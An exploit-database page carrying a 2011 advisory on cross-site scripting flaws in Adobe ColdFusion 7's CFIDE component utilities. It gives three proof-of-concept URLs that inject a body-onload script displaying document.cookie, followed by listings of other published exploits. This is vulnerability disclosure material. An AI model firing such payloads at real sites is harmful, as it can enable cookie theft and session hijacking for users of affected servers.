Menu

Search for hundreds of thousands of exploits

"Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities"

Author

Exploit author

MustLive

Platform

Exploit platform

cfm

Release date

Exploit published date

2011-09-27

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
source: https://www.securityfocus.com/bid/49787/info

Adobe ColdFusion is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Adobe ColdFusion 7 is vulnerable; other versions may also be affected. 

http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E

http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E

http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-09-16 "Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload" webapps cfm "Pankaj Kumar Thakur"
2017-10-24 "Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection" webapps cfm "Anthony Cole"
2015-04-21 "BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion" webapps cfm Portcullis
2011-09-27 "Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm MustLive
2011-08-18 "Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting" webapps cfm G.R0b1n
2011-02-24 "Alcassoft's SOPHIA CMS - SQL Injection" webapps cfm p0pc0rn
2011-02-15 "Lingxia I.C.E CMS - Blind SQL Injection" webapps cfm mr_me
2011-01-25 "ActiveWeb Professional 3.0 - Arbitrary File Upload" webapps cfm StenoPlasma
2010-12-13 "Mura CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm "Richard Brain"
2010-11-24 "ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)" webapps cfm Metasploit
Release Date Title Type Platform Author
2014-07-13 "WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection" webapps php MustLive
2013-12-17 "WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery" webapps php MustLive
2013-09-19 "WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-19 "WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-18 "WordPress Plugin RokNewsPager - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-09-17 "WordPress Plugin RokStories - 'thumb.php' Multiple Vulnerabilities" webapps php MustLive
2013-07-16 "MCImageManager - Multiple Vulnerabilities" webapps php MustLive
2013-04-21 "WordPress Theme Colormix - Multiple Vulnerabilities" webapps php MustLive
2013-04-13 "Aibolit - Information Disclosure" webapps multiple MustLive
2013-03-26 "IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities" remote multiple MustLive
2013-03-10 "SWFupload - Multiple Content Spoofing / Cross-Site Scripting Vulnerabilities" webapps php MustLive
2013-03-01 "Question2Answer - Cross-Site Request Forgery" webapps php MustLive
2013-02-20 "ZeroClipboard 1.9.x - 'id' Cross-Site Scripting" webapps php MustLive
2013-02-02 "WordPress Theme flashnews - Multiple Input Validation Vulnerabilities" webapps php MustLive
2013-01-09 "tinybrowser - 'type' Cross-Site Scripting" webapps php MustLive
2013-01-09 "TinyBrowser - 'tinybrowser.php' Directory Listing" webapps php MustLive
2013-01-09 "TinyBrowser - 'edit.php' Directory Listing" webapps php MustLive
2012-12-17 "WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext' Cross-Site Scripting" webapps php MustLive
2012-10-28 "CorePlayer - 'callback' Cross-Site Scripting" webapps php MustLive
2012-10-18 "WordPress Plugin Wordfence Security - Cross-Site Scripting" webapps php MustLive
2012-09-28 "IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities" remote multiple MustLive
2012-09-15 "IFOBS - 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities" webapps jsp MustLive
2012-08-29 "JW Player - 'logo.link' Cross-Site Scripting" webapps php MustLive
2012-07-29 "JW Player - 'playerready' Cross-Site Scripting" webapps php MustLive
2012-06-29 "LIOOSYS CMS - SQL Injection / Information Disclosure" webapps php MustLive
2012-06-15 "WordPress Plugin ORGanizer - Multiple Vulnerabilities" webapps php MustLive
2012-05-21 "Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting" webapps php MustLive
2012-03-11 "EJBCA 4.0.7 - 'issuer' Cross-Site Scripting" webapps java MustLive
2012-02-26 "Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities" webapps php MustLive
2012-02-13 "D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery" remote hardware MustLive 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected